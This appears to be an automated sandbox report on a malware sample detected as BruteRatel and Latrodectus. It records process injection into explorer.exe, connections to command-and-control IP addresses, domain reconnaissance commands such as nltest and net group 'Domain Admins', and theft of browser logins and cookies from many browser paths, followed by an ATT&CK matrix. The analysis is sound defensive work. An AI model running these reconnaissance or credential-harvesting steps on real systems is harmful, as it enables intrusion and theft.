            Source: C:\Windows\explorer.exeCode function: 7_2_0B8D1DA0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_0B8D1DA0
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8E53A8 SetUnhandledExceptionFilter,7_2_0B8E53A8

            HIPS / PFW / Operating System Protection Evasion

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exeNetwork Connect: 104.21.16.1 443Jump to behavior
            Source: C:\Windows\System32\rundll32.exeNetwork Connect: 94.232.46.11 8817Jump to behavior
            Source: C:\Windows\System32\rundll32.exeNetwork Connect: 94.232.40.41 8817Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 172.67.161.60 443Jump to behavior
            Allocates memory in foreign processes
            Source: C:\Windows\System32\rundll32.exeMemory allocated: C:\Windows\explorer.exe base: 2F20000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\System32\net.exeMemory allocated: C:\Windows\System32\net1.exe base: 241E5A50000 protect: page read and write
            Contains functionality to inject threads in other processes
            Source: C:\Windows\System32\rundll32.exeCode function: 4_3_00007DF496590100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,4_3_00007DF496590100
            Creates a thread in another existing process (thread injection)
            Source: C:\Windows\System32\rundll32.exeThread created: C:\Windows\explorer.exe EIP: 2F20000Jump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 2F20000 value starts with: 4D5AJump to behavior
            Injects code into the Windows Explorer (explorer.exe)
            Source: C:\Windows\System32\rundll32.exeMemory written: PID: 4004 base: 2F20000 value: 4DJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\System32\rundll32.exeThread register set: target process: 828Jump to behavior
            Source: C:\Windows\System32\rundll32.exeThread register set: target process: 828Jump to behavior
            Source: C:\Windows\System32\rundll32.exeThread register set: target process: 828Jump to behavior
            Source: C:\Windows\System32\rundll32.exeThread register set: target process: 828Jump to behavior
            Source: C:\Windows\System32\rundll32.exeThread register set: target process: 828Jump to behavior
            Sets debug register (to hijack the execution of another thread)
            Source: C:\Windows\System32\rundll32.exeThread register set: 828 1Jump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 2F20000Jump to behavior
            Source: C:\Windows\System32\net.exeMemory written: C:\Windows\System32\net1.exe base: 241E5A50000
            Source: C:\Windows\System32\net.exeMemory written: C:\Windows\System32\net1.exe base: 7D5E13A2D8
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /allJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trustsJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trustsJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domainJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /allJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net group "Domain Admins" /domainJump to behavior
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
            Source: C:\Windows\System32\net.exeProcess created: unknown unknown
            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
            Source: explorer.exe, 00000007.00000002.4597672025.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2399747098.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: explorer.exe, 00000007.00000002.4597672025.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4603373431.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2400901870.00000000048E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000007.00000002.4597672025.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2399747098.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000007.00000000.2399496894.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4587902556.0000000000D60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +Progman
            Source: explorer.exe, 00000007.00000002.4597672025.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2399747098.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000007.00000003.4387068567.00000000098E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.4385567219.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2979103692.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd31A
            Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_00007FFD92DB3260
            Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,4_2_00007FFD92FE09A8
            Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,4_2_00007FFD92FE08A8
            Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_00007FFD92FE0F30
            Source: C:\Windows\System32\rundll32.exeCode function: __crtGetLocaleInfoEx,GetLocaleInfoW,4_2_00007FFD92DBACC0
            Source: C:\Windows\System32\rundll32.exeCode function: try_get_function,try_get_function,GetLocaleInfoW,4_2_00007FFD92DBC4B0
            Source: C:\Windows\System32\rundll32.exeCode function: try_get_function,try_get_function,GetLocaleInfoW,4_2_00007FFD92DBC4B0
            Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoEx,__crtDownlevelLocaleNameToLCID,GetLocaleInfoW,4_2_00000001800354AC
            Source: C:\Windows\System32\rundll32.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,4_2_00000001800400E0
            Source: C:\Windows\System32\rundll32.exeCode function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,4_2_000000018002E394
            Source: C:\Windows\System32\rundll32.exeCode function: _getptd,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,TestDefaultCountry,__crtGetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,__crtGetLocaleInfoEx,_invoke_watson,4_2_00000001800423EC
            Source: C:\Windows\System32\rundll32.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,__crtGetLocaleInfoEx,_calloc_crt,__crtGetLocaleInfoEx,free,__crtGetLocaleInfoEx,_invoke_watson,4_2_00000001800384A0
            Source: C:\Windows\System32\rundll32.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,4_2_000000018004064C
            Source: C:\Windows\System32\rundll32.exeCode function: __crtGetLocaleInfoEx,__crtGetLocaleInfoEx,GetACP,4_2_0000000180042858
            Source: C:\Windows\System32\rundll32.exeCode function: __crtGetLocaleInfoEx,4_2_000000018004290C
            Source: C:\Windows\System32\rundll32.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,__crtGetUserDefaultLocaleName,_invoke_watson,_invoke_watson,_getptd,_getptd,LcidFromHexString,GetLocaleInfoW,4_2_0000000180042A10
            Source: C:\Windows\System32\rundll32.exeCode function: _getptd,EnumSystemLocalesW,4_2_0000000180042D88
            Source: C:\Windows\System32\rundll32.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,4_2_0000000180040DB0
            Source: C:\Windows\System32\rundll32.exeCode function: _getptd,EnumSystemLocalesW,4_2_0000000180042E3C
            Source: C:\Windows\System32\rundll32.exeCode function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,TestDefaultLanguage,4_2_0000000180042ED0
            Source: C:\Windows\System32\rundll32.exeCode function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,TestDefaultLanguage,4_2_0000000180043100
            Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_000000018004324C
            Source: C:\Windows\System32\rundll32.exeCode function: _getptd,GetLocaleInfoW,4_2_00000001800432FC
            Source: C:\Windows\System32\rundll32.exeCode function: _getptd,_getptd,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,_getptd,EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,__crtDownlevelLCIDToLocaleName,__crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,_itow_s,4_2_00000001800433A4
            Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,4_2_00000001800353EC
            Source: C:\Windows\System32\rundll32.exeCode function: _getptd,__lc_wcstolc,__get_qualified_locale_downlevel,__get_qualified_locale,__lc_lctowcs,__crtGetLocaleInfoEx,GetACP,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,4_2_000000018003B508
            Source: C:\Windows\System32\rundll32.exeCode function: ___lc_locale_name_func,__crtGetLocaleInfoEx,4_2_00000001800298D8
            Source: C:\Windows\System32\rundll32.exeCode function: __crtGetLocaleInfoEx,malloc,__crtGetLocaleInfoEx,WideCharToMultiByte,free,4_2_00000001800419E8
            Source: C:\Windows\System32\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_0000000180041B54
            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB2A60 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00007FFD92DB2A60
            Source: C:\Windows\explorer.exeCode function: 7_2_02F28D3C GetUserNameA,wsprintfA,7_2_02F28D3C
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92FD91F8 GetTimeZoneInformation,4_2_00007FFD92FD91F8
            Source: C:\Windows\explorer.exeCode function: 7_2_02F300E8 RtlGetVersion,7_2_02F300E8
            Source: C:\Windows\System32\nltest.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: WMIC.exe, 00000020.00000003.3556983352.00000280825C1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000020.00000003.3559120170.0000028081EBB000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000020.00000002.3560416857.000002808210B000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000020.00000002.3560255096.0000028081EBC000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000020.00000003.3556838679.0000028081EB3000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000020.00000003.3558898075.0000028081EC2000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000020.00000003.3558923493.0000028081EB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pathToSignedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: WMIC.exe, 00000020.00000002.3560416857.000002808210B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gnedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: WMIC.exe, 00000020.00000002.3559501715.000000C89C097000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ndows Defender\MsMpeng.exe
            Source: WMIC.exe, 00000020.00000002.3560416857.000002808210B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: indows Defender\MsMpeng.exe
            Source: WMIC.exe, 00000020.00000002.3560075911.0000028081E77000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000020.00000002.3560164454.0000028081E9D000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000020.00000003.3558182311.00000280825A1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000020.00000003.3556707481.0000028081E98000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000020.00000003.3559327644.0000028081E77000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000020.00000003.3556838679.0000028081E9B000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000020.00000003.3558152150.00000280825A0000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000020.00000003.3556707481.0000028081E72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected BruteRatel
            Source: Yara matchFile source: 00000004.00000003.2394515342.000001DA031BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4600031642.000001DA0329C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4600031642.000001DA0330C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4597607083.000001DA0318C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7024, type: MEMORYSTR
            Yara detected Latrodectus
            Source: Yara matchFile source: 00000007.00000002.4606571879.000000000950A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Contains functionality to steal Internet Explorer form passwords
            Source: C:\Windows\explorer.exeCode function: Software\Microsoft\Internet Explorer\IntelliForms\Storage27_2_0B848848
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Suhba\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Go!\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shmJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Rafotech\Mustang\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\RockMelt\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Safer Technologies\Secure Browser\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Bromium\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Login DataJump to behavior

            Remote Access Functionality

            barindex
            Yara detected BruteRatel
            Source: Yara matchFile source: 00000004.00000003.2394515342.000001DA031BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4600031642.000001DA0329C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4600031642.000001DA0330C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4597607083.000001DA0318C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7024, type: MEMORYSTR
            Yara detected Latrodectus
            Source: Yara matchFile source: 00000007.00000002.4606571879.000000000950A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB34A0 Concurrency::details::WorkItem::BindTo,4_2_00007FFD92DB34A0

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Replication Through Removable Media            		131
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		2
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		2
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API            		1
            Windows Service            		1
            Windows Service            		1
            Deobfuscate/Decode Files or Information            		1
            Credentials In Files            		11
            Peripheral Device Discovery            		Remote Desktop Protocol1
            Data from Local System            		21
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Service Execution            		Logon Script (Windows)913
            Process Injection            		2
            Obfuscated Files or Information            		Security Account Manager1
            Account Discovery            		SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading            		NTDS2
            File and Directory Discovery            		Distributed Component Object ModelInput Capture3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            File Deletion            		LSA Secrets38
            System Information Discovery            		SSHKeylogging114
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
            Masquerading            		Cached Domain Credentials2101
            Security Software Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items23
            Virtualization/Sandbox Evasion            		DCSync23
            Virtualization/Sandbox Evasion            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job913
            Process Injection            		Proc Filesystem13
            Process Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Rundll32            		/etc/passwd and /etc/shadow1
            Application Window Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
            System Owner/User Discovery            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
            Remote System Discovery            		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
            Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled TaskEmbedded PayloadsKeylogging21
            System Network Configuration Discovery            		Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
